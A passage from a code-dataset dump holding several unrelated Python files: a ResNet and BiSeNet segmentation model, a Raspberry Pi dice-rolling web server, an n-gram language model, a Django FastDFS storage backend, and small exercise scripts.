4.\n strides (Sequence[int]): Strides of the first block of each stage.\n dilations (Sequence[int]): Dilation of each stage.\n out_indices (Sequence[int]): Output from which stages.\n style (str): `pytorch` or `caffe`. If set to \"pytorch\", the stride-two\n layer is the 3x3 conv layer, otherwise the stride-two layer is\n the first 1x1 conv layer.\n frozen_stages (int): Stages to be frozen (stop grad and set eval mode).\n -1 means not freezing any parameters.\n norm_cfg (dict): dictionary to construct and config norm layer.\n norm_eval (bool): Whether to set norm layers to eval mode, namely,\n freeze running stats (mean and var). Note: Effect on Batch Norm\n and its variants only.\n with_cp (bool): Use checkpoint or not. Using checkpoint will save some\n memory while slowing down the training speed.\n zero_init_residual (bool): whether to use zero init for last norm layer\n in resblocks to let them behave as identity.\n Example:\n >>> from openselfsup.models import ResNet\n >>> import torch\n >>> self = ResNet(depth=18)\n >>> self.eval()\n >>> inputs = torch.rand(1, 3, 32, 32)\n >>> level_outputs = self.forward(inputs)\n >>> for level_out in level_outputs:\n ... print(tuple(level_out.shape))\n (1, 64, 8, 8)\n (1, 128, 4, 4)\n (1, 256, 2, 2)\n (1, 512, 1, 1)\n \"\"\"\n\n arch_settings = {\n 18: (BasicBlock, (2, 2, 2, 2)),\n 34: (BasicBlock, (3, 4, 6, 3)),\n 50: (Bottleneck, (3, 4, 6, 3)),\n 101: (Bottleneck, (3, 4, 23, 3)),\n 152: (Bottleneck, (3, 8, 36, 3))\n }\n\n def __init__(self,\n depth=50,\n in_channels=3,\n num_stages=4,\n strides=(1, 2, 2, 2),\n dilations=(1, 1, 1, 1),\n out_indices=(0, 1, 2, 3, 4),\n style='pytorch',\n frozen_stages=-1,\n conv_cfg=None,\n norm_cfg=dict(type='BN', requires_grad=True),\n norm_eval=False,\n with_cp=False,\n zero_init_residual=False,\n pretrained=None,\n init_cfg=None):\n super(DepthResNet, self).__init__()\n if depth not in self.arch_settings:\n raise KeyError('invalid depth {} for resnet'.format(depth))\n self.zero_init_residual = zero_init_residual\n self.pretrained = pretrained\n block_init_cfg = None\n assert not (init_cfg and pretrained), \\\n 'init_cfg and pretrained cannot be setting at the same time'\n if isinstance(pretrained, str):\n warnings.warn('DeprecationWarning: pretrained is a deprecated, '\n 'please use \"init_cfg\" instead')\n self.init_cfg = dict(type='Pretrained', checkpoint=pretrained)\n elif pretrained is None:\n if init_cfg is None:\n self.init_cfg = [\n dict(type='Kaiming', layer='Conv2d'),\n dict(\n type='Constant',\n val=1,\n layer=['_BatchNorm', 'GroupNorm'])\n ]\n block = self.arch_settings[depth][0]\n if self.zero_init_residual:\n if block is BasicBlock:\n block_init_cfg = dict(\n type='Constant',\n val=0,\n override=dict(name='norm2'))\n elif block is Bottleneck:\n block_init_cfg = dict(\n type='Constant',\n val=0,\n override=dict(name='norm3'))\n else:\n raise TypeError('pretrained must be a str or None')\n\n\n self.depth = depth\n self.num_stages = num_stages\n assert num_stages >= 1 and num_stages <= 4\n self.strides = strides\n self.dilations = dilations\n assert len(strides) == len(dilations) == num_stages\n self.out_indices = out_indices\n assert max(out_indices) < num_stages + 1\n self.style = style\n self.frozen_stages = frozen_stages\n self.conv_cfg = conv_cfg\n self.norm_cfg = norm_cfg\n self.with_cp = with_cp\n self.norm_eval = norm_eval\n self.zero_init_residual = zero_init_residual\n self.block, stage_blocks = self.arch_settings[depth]\n self.stage_blocks = stage_blocks[:num_stages]\n self.inplanes = 64\n\n self._make_stem_layer(in_channels)\n\n self.res_layers = []\n for i, num_blocks in enumerate(self.stage_blocks):\n stride = strides[i]\n dilation = dilations[i]\n planes = 64 * 2**i\n res_layer = make_res_layer(\n self.block,\n self.inplanes,\n planes,\n num_blocks,\n stride=stride,\n dilation=dilation,\n style=self.style,\n with_cp=with_cp,\n conv_cfg=conv_cfg,\n norm_cfg=norm_cfg)\n self.inplanes = planes * self.block.expansion\n layer_name = 'layer{}'.format(i + 1)\n self.add_module(layer_name, res_layer)\n self.res_layers.append(layer_name)\n\n self.feat_dim = self.block.expansion * 64 * 2**(\n len(self.stage_blocks) - 1)\n\n @property\n def norm1(self):\n return getattr(self, self.norm1_name)\n\n def _make_stem_layer(self, in_channels):\n self.conv1 = build_conv_layer(\n self.conv_cfg,\n in_channels,\n 64,\n kernel_size=7,\n stride=2,\n padding=3,\n bias=False)\n self.norm1_name, norm1 = build_norm_layer(self.norm_cfg, 64, postfix=1)\n self.add_module(self.norm1_name, norm1)\n self.relu = nn.ReLU(inplace=True)\n self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\n\n def forward(self, x):\n outs = []\n x = self.conv1(x)\n x = self.norm1(x)\n x = self.relu(x) # r50: 64x128x128\n\n # # remove this hack!\n # x = self.maxpool(x)\n \n if 0 in self.out_indices:\n outs.append(x)\n x = self.maxpool(x) # r50: 64x56x56\n for i, layer_name in enumerate(self.res_layers):\n res_layer = getattr(self, layer_name)\n x = res_layer(x)\n if i + 1 in self.out_indices:\n outs.append(x)\n # r50: 1-256x56x56; 2-512x28x28; 3-1024x14x14; 4-2048x7x7\n return tuple(outs)\n\n","repo_name":"zhyever/DepthFormer","sub_path":"mmdepth/models/backbones/resnet.py","file_name":"resnet.py","file_ext":"py","file_size_in_byte":15938,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"39383604865","text":"import json\nimport sys\n\n\ndef main(data):\n data = json.load(data)\n for k, v in data.items():\n if type(v) == list:\n print(f'{k}: {\", \".join(map(str,v))}')\n else:\n print(f'{k}: {v}')\n\n\nif __name__ == '__main__':\n main(sys.stdin)\n \n","repo_name":"Serebryankka/My-Solutions-Python-Generation-a-course-for-professionals","sub_path":"Module_4/Module_4_4/Module_4_4_6.py","file_name":"Module_4_4_6.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22133382689","text":"import RPi.GPIO as GPIO\nimport time\nimport os\nimport picamera\nimport bottle\nfrom bottle import route, run, template, redirect, static_file\nfrom shutil import copyfile\nimport wrfl_count\nimport json\nimport wrfl_twitter\n\n\n\nbottle.TEMPLATE_PATH.insert(0,'/opt/wrfl/views')\n\n# Pin 18 als Ausgang deklarieren\nGPIO.setwarnings(False)\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(18, GPIO.OUT)\n\nCAMLED = 32\nGPIO.setup(CAMLED, GPIO.OUT, initial=False)\n\nServo = GPIO.PWM(18, 50)\n\n\ndef fileAge(fname):\n # returns age of file in seconds\n st = os.stat(fname)\n age = (time.time() - st.st_mtime)\n return age\n\n\ndef isRolling():\n # checks if a request is active\n if os.path.isfile('rolling'):\n # ignore too old files\n if fileAge('rolling') > 30:\n endRolling()\n return False\n else:\n return True\n\n\ndef startRolling():\n # touches file to indicate an active roll process\n open('rolling', 'a').close()\n\n\ndef endRolling():\n # removes file to indicate and of roll process\n if os.path.exists('rolling'):\n os.unlink('rolling')\n\n\ndef rollDice():\n startRolling()\n try:\n Servo.start(1.55)\n time.sleep(1)\n Servo.start(7)\n with picamera.PiCamera() as camera:\n camera.resolution = (1024, 768)\n camera.color_effects = (128, 128)\n camera.start_preview()\n\n # crop (x,y,w,h), values range: [0,1]\n # camera.crop = (0.53, 0.28, 0.16, 0.2)\n camera.crop = (0.56, 0.28, 0.16, 0.2) # slightly right\n\n\n GPIO.output(CAMLED,False)\n # Camera warm-up time\n time.sleep(0.8)\n camera.capture('/opt/wrfl/img/w.jpg', resize=(60, 60))\n\n pip = wrfl_count.countPip()\n f = open('pip.txt', 'w')\n f.write(str(pip))\n f.close()\n\n pipStr = '-' + ('u' if pip == 0 else str(pip))\n target = '/opt/wrfl/img/foo-'+ str(int(time.time())) + pipStr + '.jpg'\n copyfile('/opt/wrfl/img/w.jpg', target)\n\n if pip > 0:\n wrfl_twitter.tweet('eine ' + str(pip))\n else:\n wrfl_twitter.tweet('unklar')\n\n except:\n # remove file in any case\n endRolling()\n\n endRolling()\n\n\n\n\ndef readPip():\n if os.path.exists('pip.txt'):\n f = open('pip.txt', 'r')\n pip = f.read()\n f.close()\n else:\n pip = 23\n\n return int(pip)\n\n\n\n@route('/')\ndef index():\n timestamp = int(time.time())\n pip = readPip()\n\n return template('index', timestamp=timestamp, pip=pip)\n\n\n@route('/wrfl')\ndef index():\n if isRolling():\n jsonData = json.dumps({'error': 1})\n else:\n rollDice()\n pip = readPip()\n jsonData = json.dumps({'pip':pip})\n\n return str(jsonData)\n\n\n\n@route('/img/')\ndef server_static(filename):\n return static_file(filename, root='/opt/wrfl/img')\n\n\n@route('/resources/')\ndef server_static(filename):\n return static_file(filename, root='/opt/wrfl/resources')\n\n\n@route('/css/')\ndef server_static(filename):\n return static_file(filename, root='/opt/wrfl/css')\n\n\n\nrun(host='0.0.0.0', port=8080, server='paste')\n#run(host='0.0.0.0', port=8080)\n\n","repo_name":"KombinatAeppaeraet/WRFL","sub_path":"wrfl.py","file_name":"wrfl.py","file_ext":"py","file_size_in_byte":3187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23557221272","text":"#Read file \nimport re\nimport math\nfrom itertools import product\n\nstart_word = \"\"\nend_word = \"\"\n\ndef readData(file_path):\n\twith open(file_path) as file: \n\t\t \treturn [re.split(\"\\s+\", line.rstrip('\\n')) for line in file]\n\ndef calculate_Num_UniGram(sentences):\n\tunigram_count = 0\n\tfor s in sentences:\n\t\tunigram_count += len(s) - 2\n\treturn unigram_count\n\n\n\ndef calculate_NUM_BiGrame(sentences):\n\tbigram_count = 0;\n\tfor s in sentences:\n\t\tbigram_count += len(s) - 1\n\treturn bigram_count\n\nclass UniGramLM:\n\tdef __init__(self, sentences, smoothing=False):\n\t\tself.uni_freq = dict()\n\t\tself.corpus_len = 0\n\t\tfor s in sentences:\n\t\t \tfor w in s:\n\t\t \t\tself.uni_freq[w] = self.uni_freq.get(w, 0) + 1\n\t\t \t\t#print(self.uni_freq[w])\n\t\t \t\tif w != start_word and w != end_word:\n\t\t \t\t\tself.corpus_len += 1\n\t\tself.num_unique_words = len(self.uni_freq) - 2\n\n\t# unigram = count(word)/count(words)\n\tdef prob_unigram(self, word):\n\t\tnum_word = self.uni_freq.get(word, 0)\n\t\tnum_corpus_word = self.corpus_len\n\t\treturn float(num_word) / float(num_corpus_word)\n\n\n\t# sentence prob = multiple of prob word unigram P(a b c) = P(a) * P(b) * P(c)\n\tdef sentence_prob(self, sentence, normalize_prob=True):\n\t\tlog_sum_prob_sen = 0\n\t\tprob_sen = 1\n\t\tfor w in sentence:\n\t\t\tword_prob = self.prob_unigram(w)\n\t\t\tprob_sen *= word_prob\n\t\tlog_sum_prob_sen = math.log(prob_sen, 2)\n\t\treturn math.pow(2, log_sum_prob_sen) if normalize_prob else log_sum_prob_sen\n\nclass NGram:\n\tdef __init__(self, sentences, nGram, smoothing=False):\n\t\tself.N_freq = dict()\n\t\tself.N_1_freq = dict()\n\t\tself.N_Prob = dict()\n\t\tself.N_freq = self.NGram_count(sentences, nGram)\n\t\tself.N_1_freq = self.NGram_count(sentences, nGram - 1)\n\t\tself.N_Prob = self.NGram_prob(nGram);\n\n\t# Counting the number of n words\n\tdef NGram_count(self, sentences, nGram):\n\t\tN_freq = dict()\n\t\tfor s in sentences:\n\t\t\tprevious_words = ()\n\t\t\tpr = tuple(s)\n\t\t\tn_count = 0\n\t\t\tfor index in range(len(pr) + 1 - nGram):\n\t\t\t\tn_count = index\n\t\t\t\tfor ind in range(nGram):\n\t\t\t\t\tprevious_words += (pr[n_count + ind],)\n\n\t\t\t\tif len(previous_words) == nGram:\n\t\t\t\t\tN_freq[(previous_words)] = N_freq.get((previous_words),0) + 1\n\t\t\t\t\tprevious_words = ()\n\t\treturn N_freq;\n\n\t# Estimate probability of NGram\n\tdef NGram_prob(self, nGram):\n\t\tfor k, v in self.N_freq.items():\n\t\t\tfor k_1, v_1 in self.N_1_freq.items():\n\t\t\t\tfor index in range(len(k) + 1 - nGram):\n\t\t\t\t\tif k_1 == k[index:index + nGram - 1]:\n\t\t\t\t\t\t#print(\"P\" + str(k) + \"= \" + str(float(v/v_1)))\n\t\t\t\t\t\tself.N_Prob[k] = float(v/v_1)\n\t\t\t\t\t\tbreak\n\t\treturn self.N_Prob\n\n\t# Estimate log probability of a sentence\n\tdef NGram_sentence_prob_log(self, nGram, sentence):\n\t\tprevious_words = ()\n\t\tpr = sentence.split(\" \")\n\t\tpr = tuple(pr)\n\t\tn_count = 0\n\t\ts_freq = []\n\t\tprob_sum_log = 0.0\n\n\t\tfor index in range(len(pr) + 1 - nGram):\n\t\t\tn_count = index\n\t\t\tfor ind in range(nGram):\n\t\t\t\tprevious_words += (pr[n_count + ind],)\n\n\t\t\tif len(previous_words) == nGram:\n\t\t\t\ts_freq.append(previous_words)\n\t\t\t\tprevious_words = () \n\n\t\tfor n_key in s_freq:\n\t\t\ttry:\n\t\t\t\tprob_sum_log += math.log(self.N_Prob.get(n_key, 2))\t\t\n\t\t\texcept:\n\t\t\t\tprob_sum_log += float(0)\n\t\treturn prob_sum_log\n\t\n\t# Estimate prob of a sentence\n\tdef NGram_sentence_prob(self, nGram, sentence):\n\t\tprevious_words = ()\n\t\tpr = sentence.split(\" \")\n\t\tpr = tuple(pr)\n\t\tn_count = 0\n\t\ts_freq = []\n\n\t\tfor index in range(len(pr) + 1 - nGram):\n\t\t\tn_count = index\n\t\t\tfor ind in range(nGram):\n\t\t\t\tprevious_words += (pr[n_count + ind],)\n\n\t\t\tif len(previous_words) == nGram:\n\t\t\t\ts_freq.append(previous_words)\n\t\t\t\tprevious_words = () \n\n\t\tprob_mul = 1.0\n\t\tfor n_key in s_freq:\n\t\t\tprob_mul *= self.N_Prob.get(n_key, 1)\t\n\n\t\treturn prob_mul\n\n\t# perplexity references to chapter 4 Language Modeling with N-grams.\n\tdef NGram_perplexity(self, biGramML, sentence, nGram=2):\n\t\tprob_w = biGramML.NGram_sentence_prob(nGram, sentence)\n\t\tn_gram_count = len(sentence.split(\" \")) - 2\n\t\t\n\t\ttry:\n\t\t\tsentence_probability_log_sum = math.log(prob_w)\n\t\texcept:\n\t\t\tsentence_probability_log_sum = float('-inf')\n\t\t\n\t\texp = -1 / n_gram_count\n\t\treturn math.pow(prob_w, exp)\n\n\nif __name__ == '__main__':\n\n\t# corpus for Language Model\n\tdata = readData(\"./sampledata.txt\")\n\n\t# Test sentence\n\tsentence = \" I am a man I do not like \"\n\n\t# Number of Ngram\n\tN_Gram = 2\n\n\t# Language Models\n\tnGramML = NGram(data, N_Gram, smoothing=False)\n\tbiGramML = NGram(data, 2, smoothing=False)\n\n\t# Estimate probability for language model\n\tnGramML.NGram_prob(N_Gram)\n\n\t# Calculate perplexity of the test sentence\n\tprint(nGramML.NGram_perplexity(biGramML, sentence))\n\n\t# Calculate the probility of a sentence\n\tprint(\"probability of sentence = \" + str(nGramML.NGram_sentence_prob_log(N_Gram, sentence)))\n\n\t\n\t\t\t\t\n\n\n\n\n\n\n","repo_name":"TrungThanhTran/Natural-Language-Processing-and-Speech","sub_path":"chapter4/language-models/languagemodel.py","file_name":"languagemodel.py","file_ext":"py","file_size_in_byte":4653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7031087852","text":"from django.core.files.storage import Storage\nfrom django.conf import settings\nfrom fdfs_client.client import Fdfs_client\n\nclass FDFSStorage(Storage):\n '''fast dfs 文件存储类'''\n def __init__(self, client_conf=None, base_url=None):\n if client_conf == None:\n self.client_conf = settings.FASTDFS_CLIENT_CONF\n else:\n self.client_conf = client_conf\n\n if base_url == None:\n self.base_url = settings.DAST_URL\n else:\n self.base_url = base_url\n\n def _open(self, name, mode='rb'):\n pass\n\n def _save(self, name, content):\n '''保存文件使用'''\n client = Fdfs_client(self.client_conf)\n ret = client.upload_by_buffer(content.read())\n '''return dict {\n 'Group name' : group_name,\n 'Remote file_id' : remote_file_id,\n 'Status' : 'Upload successed.',\n 'Local file name' : '',\n 'Uploaded size' : upload_size,\n 'Storage IP' : storage_ip\n } if success else None'''\n if ret.get('Status') != 'Upload successed.':\n raise Exception('上传文件到 fast dfs失败')\n filename = ret.get('Remote file_id')\n return filename\n\n def exists(self, name):\n '''django判断文件名是否可以使用'''\n return False\n\n def url(self, name):\n return self.base_url + name","repo_name":"abctan/django_everyfresh","sub_path":"utils/fdfs/storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18675527566","text":"\"\"\"\n BiSeNet for CelebAMask-HQ, implemented in Chainer.\n Original paper: 'BiSeNet: Bilateral Segmentation Network for Real-time Semantic Segmentation,'\n https://arxiv.org/abs/1808.00897.\n\"\"\"\n\n__all__ = ['BiSeNet', 'bisenet_resnet18_celebamaskhq']\n\nimport os\nimport chainer.functions as F\nfrom chainer import Chain\nfrom chainer.serializers import load_npz\nfrom .common import conv1x1, conv1x1_block, conv3x3_block, InterpolationBlock, MultiOutputSequential\nfrom .resnet import resnet18\n\n\nclass PyramidPoolingZeroBranch(Chain):\n \"\"\"\n Pyramid pooling zero branch.\n\n Parameters:\n ----------\n in_channels : int\n Number of input channels.\n out_channels : int\n Number of output channels.\n in_size : tuple of 2 int\n Spatial size of output image for the upsampling operation.\n \"\"\"\n def __init__(self,\n in_channels,\n out_channels,\n in_size):\n super(PyramidPoolingZeroBranch, self).__init__()\n self.in_size = in_size\n\n with self.init_scope():\n self.conv = conv1x1_block(\n in_channels=in_channels,\n out_channels=out_channels)\n self.up = InterpolationBlock(\n scale_factor=None,\n mode=\"nearest\")\n\n def __call__(self, x):\n in_size = self.in_size if self.in_size is not None else x.shape[2:]\n x = F.average_pooling_2d(x, ksize=x.shape[2:])\n x = self.conv(x)\n x = self.up(x, size=in_size)\n return x\n\n\nclass AttentionRefinementBlock(Chain):\n \"\"\"\n Attention refinement block.\n\n Parameters:\n ----------\n in_channels : int\n Number of input channels.\n out_channels : int\n Number of output channels.\n \"\"\"\n def __init__(self,\n in_channels,\n out_channels):\n super(AttentionRefinementBlock, self).__init__()\n with self.init_scope():\n self.conv1 = conv3x3_block(\n in_channels=in_channels,\n out_channels=out_channels)\n self.conv2 = conv1x1_block(\n in_channels=out_channels,\n out_channels=out_channels,\n activation=(lambda: F.sigmoid))\n\n def __call__(self, x):\n x = self.conv1(x)\n w = F.average_pooling_2d(x, ksize=x.shape[2:])\n w = self.conv2(w)\n x = x * w\n return x\n\n\nclass PyramidPoolingMainBranch(Chain):\n \"\"\"\n Pyramid pooling main branch.\n\n Parameters:\n ----------\n in_channels : int\n Number of input channels.\n out_channels : int\n Number of output channels.\n scale_factor : float\n Multiplier for spatial size.\n \"\"\"\n def __init__(self,\n in_channels,\n out_channels,\n scale_factor):\n super(PyramidPoolingMainBranch, self).__init__()\n with self.init_scope():\n self.att = AttentionRefinementBlock(\n in_channels=in_channels,\n out_channels=out_channels)\n self.up = InterpolationBlock(\n scale_factor=scale_factor,\n mode=\"nearest\")\n self.conv = conv3x3_block(\n in_channels=out_channels,\n out_channels=out_channels)\n\n def __call__(self, x, y):\n x = self.att(x)\n x = x + y\n x = self.up(x)\n x = self.conv(x)\n return x\n\n\nclass FeatureFusion(Chain):\n \"\"\"\n Feature fusion block.\n\n Parameters:\n ----------\n in_channels : int\n Number of input channels.\n out_channels : int\n Number of output channels.\n reduction : int, default 4\n Squeeze reduction value.\n \"\"\"\n def __init__(self,\n in_channels,\n out_channels,\n reduction=4):\n super(FeatureFusion, self).__init__()\n mid_channels = out_channels // reduction\n\n with self.init_scope():\n self.conv_merge = conv1x1_block(\n in_channels=in_channels,\n out_channels=out_channels)\n self.conv1 = conv1x1(\n in_channels=out_channels,\n out_channels=mid_channels)\n self.activ = F.relu\n self.conv2 = conv1x1(\n in_channels=mid_channels,\n out_channels=out_channels)\n self.sigmoid = F.sigmoid\n\n def __call__(self, x, y):\n x = F.concat((x, y), axis=1)\n x = self.conv_merge(x)\n w = F.average_pooling_2d(x, ksize=x.shape[2:])\n w = self.conv1(w)\n w = self.activ(w)\n w = self.conv2(w)\n w = self.sigmoid(w)\n x_att = x * w\n x = x + x_att\n return x\n\n\nclass PyramidPooling(Chain):\n \"\"\"\n Pyramid Pooling module.\n\n Parameters:\n ----------\n x16_in_channels : int\n Number of input channels for x16.\n x32_in_channels : int\n Number of input channels for x32.\n y_out_channels : int\n Number of output channels for y-outputs.\n y32_out_size : tuple of 2 int\n Spatial size of the y32 tensor.\n \"\"\"\n def __init__(self,\n x16_in_channels,\n x32_in_channels,\n y_out_channels,\n y32_out_size):\n super(PyramidPooling, self).__init__()\n z_out_channels = 2 * y_out_channels\n\n with self.init_scope():\n self.pool32 = PyramidPoolingZeroBranch(\n in_channels=x32_in_channels,\n out_channels=y_out_channels,\n in_size=y32_out_size)\n self.pool16 = PyramidPoolingMainBranch(\n in_channels=x32_in_channels,\n out_channels=y_out_channels,\n scale_factor=2)\n self.pool8 = PyramidPoolingMainBranch(\n in_channels=x16_in_channels,\n out_channels=y_out_channels,\n scale_factor=2)\n self.fusion = FeatureFusion(\n in_channels=z_out_channels,\n out_channels=z_out_channels)\n\n def __call__(self, x8, x16, x32):\n y32 = self.pool32(x32)\n y16 = self.pool16(x32, y32)\n y8 = self.pool8(x16, y16)\n z8 = self.fusion(x8, y8)\n return z8, y8, y16\n\n\nclass BiSeHead(Chain):\n \"\"\"\n BiSeNet head (final) block.\n\n Parameters:\n ----------\n in_channels : int\n Number of input channels.\n mid_channels : int\n Number of middle channels.\n out_channels : int\n Number of output channels.\n \"\"\"\n def __init__(self,\n in_channels,\n mid_channels,\n out_channels):\n super(BiSeHead, self).__init__()\n with self.init_scope():\n self.conv1 = conv3x3_block(\n in_channels=in_channels,\n out_channels=mid_channels)\n self.conv2 = conv1x1(\n in_channels=mid_channels,\n out_channels=out_channels)\n\n def __call__(self, x):\n x = self.conv1(x)\n x = self.conv2(x)\n return x\n\n\nclass BiSeNet(Chain):\n \"\"\"\n BiSeNet model from 'BiSeNet: Bilateral Segmentation Network for Real-time Semantic Segmentation,'\n https://arxiv.org/abs/1808.00897.\n\n Parameters:\n ----------\n backbone : func -> nn.Sequential\n Feature extractor.\n aux : bool, default True\n Whether to output an auxiliary results.\n fixed_size : bool, default True\n Whether to expect fixed spatial size of input image.\n in_channels : int, default 3\n Number of input channels.\n in_size : tuple of two ints, default (640, 480)\n Spatial size of the expected input image.\n classes : int, default 1000\n Number of classification classes.\n \"\"\"\n def __init__(self,\n backbone,\n aux=True,\n fixed_size=True,\n in_channels=3,\n in_size=(640, 480),\n classes=19):\n super(BiSeNet, self).__init__()\n assert (in_channels == 3)\n self.in_size = in_size\n self.classes = classes\n self.aux = aux\n self.fixed_size = fixed_size\n\n with self.init_scope():\n self.backbone, backbone_out_channels = backbone()\n\n y_out_channels = backbone_out_channels[0]\n z_out_channels = 2 * y_out_channels\n y32_out_size = (self.in_size[0] // 32, self.in_size[1] // 32) if fixed_size else None\n self.pool = PyramidPooling(\n x16_in_channels=backbone_out_channels[1],\n x32_in_channels=backbone_out_channels[2],\n y_out_channels=y_out_channels,\n y32_out_size=y32_out_size)\n self.head_z8 = BiSeHead(\n in_channels=z_out_channels,\n mid_channels=z_out_channels,\n out_channels=classes)\n self.up8 = InterpolationBlock(scale_factor=(8 if fixed_size else None))\n\n if self.aux:\n mid_channels = y_out_channels // 2\n self.head_y8 = BiSeHead(\n in_channels=y_out_channels,\n mid_channels=mid_channels,\n out_channels=classes)\n self.head_y16 = BiSeHead(\n in_channels=y_out_channels,\n mid_channels=mid_channels,\n out_channels=classes)\n self.up16 = InterpolationBlock(scale_factor=(16 if fixed_size else None))\n\n def __call__(self, x):\n assert (x.shape[2] % 32 == 0) and (x.shape[3] % 32 == 0)\n\n x8, x16, x32 = self.backbone(x)\n z8, y8, y16 = self.pool(x8, x16, x32)\n\n z8 = self.head_z8(z8)\n z8 = self.up8(z8)\n\n if self.aux:\n y8 = self.head_y8(y8)\n y16 = self.head_y16(y16)\n y8 = self.up8(y8)\n y16 = self.up16(y16)\n return z8, y8, y16\n else:\n return z8\n\n\ndef get_bisenet(model_name=None,\n pretrained=False,\n root=os.path.join(\"~\", \".chainer\", \"models\"),\n **kwargs):\n \"\"\"\n Create BiSeNet model with specific parameters.\n\n Parameters:\n ----------\n model_name : str or None, default None\n Model name for loading pretrained model.\n pretrained : bool, default False\n Whether to load the pretrained weights for model.\n root : str, default '~/.chainer/models'\n Location for keeping the model parameters.\n \"\"\"\n net = BiSeNet(\n **kwargs)\n\n if pretrained:\n if (model_name is None) or (not model_name):\n raise ValueError(\"Parameter `model_name` should be properly initialized for loading pretrained model.\")\n from .model_store import get_model_file\n load_npz(\n file=get_model_file(\n model_name=model_name,\n local_model_store_dir_path=root),\n obj=net)\n\n return net\n\n\ndef bisenet_resnet18_celebamaskhq(pretrained_backbone=False, classes=19, **kwargs):\n \"\"\"\n BiSeNet model on the base of ResNet-18 for face segmentation on CelebAMask-HQ from 'BiSeNet: Bilateral Segmentation\n Network for Real-time Semantic Segmentation,' https://arxiv.org/abs/1808.00897.\n\n Parameters:\n ----------\n pretrained_backbone : bool, default False\n Whether to load the pretrained weights for feature extractor.\n classes : int, default 19\n Number of classes.\n pretrained : bool, default False\n Whether to load the pretrained weights for model.\n root : str, default '~/.chainer/models'\n Location for keeping the model parameters.\n \"\"\"\n def backbone():\n features_raw = resnet18(pretrained=pretrained_backbone).features\n del features_raw.final_pool\n features = MultiOutputSequential(return_last=False)\n with features.init_scope():\n setattr(features, \"init_block\", features_raw.el(0))\n for i, block_name in enumerate(features_raw.layer_names[1:]):\n stage = features_raw[block_name]\n if i != 0:\n stage.do_output = True\n setattr(features, \"stage{}\".format(i + 1), stage)\n out_channels = [128, 256, 512]\n return features, out_channels\n return get_bisenet(backbone=backbone, classes=classes, model_name=\"bisenet_resnet18_celebamaskhq\", **kwargs)\n\n\ndef _test():\n import numpy as np\n import chainer\n\n chainer.global_config.train = False\n\n in_size = (640, 480)\n aux = True\n pretrained = False\n\n models = [\n bisenet_resnet18_celebamaskhq,\n ]\n\n for model in models:\n\n net = model(pretrained=pretrained, in_size=in_size, aux=aux)\n weight_count = net.count_params()\n print(\"m={}, {}\".format(model.__name__, weight_count))\n if aux:\n assert (model != bisenet_resnet18_celebamaskhq or weight_count == 13300416)\n else:\n assert (model != bisenet_resnet18_celebamaskhq or weight_count == 13150272)\n\n batch = 1\n x = np.random.rand(batch, 3, in_size[0], in_size[1]).astype(np.float32)\n ys = net(x)\n y = ys[0] if aux else ys\n assert (y.shape == (batch, 19, in_size[0], in_size[1]))\n\n\nif __name__ == \"__main__\":\n _test()\n","repo_name":"osmr/imgclsmob","sub_path":"chainer_/chainercv2/models/bisenet.py","file_name":"bisenet.py","file_ext":"py","file_size_in_byte":13212,"program_lang":"python","lang":"en","doc_type":"code","stars":2864,"dataset":"github-code","pt":"37"} +{"seq_id":"26613809033","text":"def find(x):\n if par[x] < 0:\n return x\n\n par[x] = find(par[x])\n return par[x]\n\n\ndef union(x, y):\n x = find(x)\n y = find(y)\n if x == y:\n return\n\n if par[x] > par[y]:\n x, y = y, x\n\n par[x] += par[y]\n par[y] = x\n\n\ndef same(x, y):\n return find(x) == find(y)\n\n\nn = int(input())\nnames = set()\nS, T = [], []\nfor _ in range(n):\n s, t = input().split()\n S.append(s)\n T.append(t)\n names.add(s)\n names.add(t)\n\nstr2num: dict = {}\nnum2str: dict = {}\n\nfor i, name in enumerate(names):\n str2num[name] = i\n num2str[i] = name\n\npar = [-1] * len(names)\n\n\nfor s, t in zip(S, T):\n ss = str2num[s]\n tt = str2num[t]\n if same(ss, tt):\n print(\"No\")\n exit()\n union(ss, tt)\nprint(\"Yes\")\n","repo_name":"mei28/Competitive-programing","sub_path":"ABC-285/D_Union.py","file_name":"D_Union.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21446257222","text":"\"\"\"\nfind node ids of players that have recently played\n\"\"\"\n\nfrom parse_tools import parse_line, format_name\n\ndef find_recent_ids(nodes, year_thresh, roster_file_name):\n \"\"\"\n loop through roster file and check players\n against thresh. return ids of new players from nodes\n \"\"\"\n recent_players = set()\n\n with open(roster_file_name) as file_in:\n for line in file_in:\n player, _, _, year = parse_line(line)\n\n if int(year) >= year_thresh:\n recent_players.add(format_name(player))\n\n recent_ids = []\n for node_id, name in nodes.items():\n if name in recent_players:\n recent_ids.append(node_id)\n return recent_ids\n\nif __name__ == \"__main__\":\n node_file_name = '../data/player_graph/nodes.csv'\n roster_file_name = '../data/roster_data.tsv'\n\n year_thresh = 2013\n\n output_file_name = '../data/player_graph/node_ids_since_'\n output_file_name += str(year_thresh)\n output_file_name += '.txt'\n\n # read nodes\n nodes = {}\n with open(node_file_name, 'r') as file_in:\n next(file_in) # skip header row\n for line in file_in:\n player_id, label = line.strip().split(',')\n nodes[int(player_id)] = label\n\n recent_ids = find_recent_ids(nodes, int(year_thresh),\n roster_file_name)\n\n with open(output_file_name, 'w') as file_out:\n for rid in recent_ids:\n print(rid, file=file_out)\n","repo_name":"kevinsprong23/buda-graph","sub_path":"create/find_recent_players.py","file_name":"find_recent_players.py","file_ext":"py","file_size_in_byte":1461,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"24651924939","text":"from __future__ import (absolute_import, division, print_function)\n__metaclass__ = type\n\nimport pkg_resources\nfrom ephemeral import shell\nfrom ephemeral.shell import cout\n\ndef pip_install(context, package, extra_args = None):\n try:\n pkg = 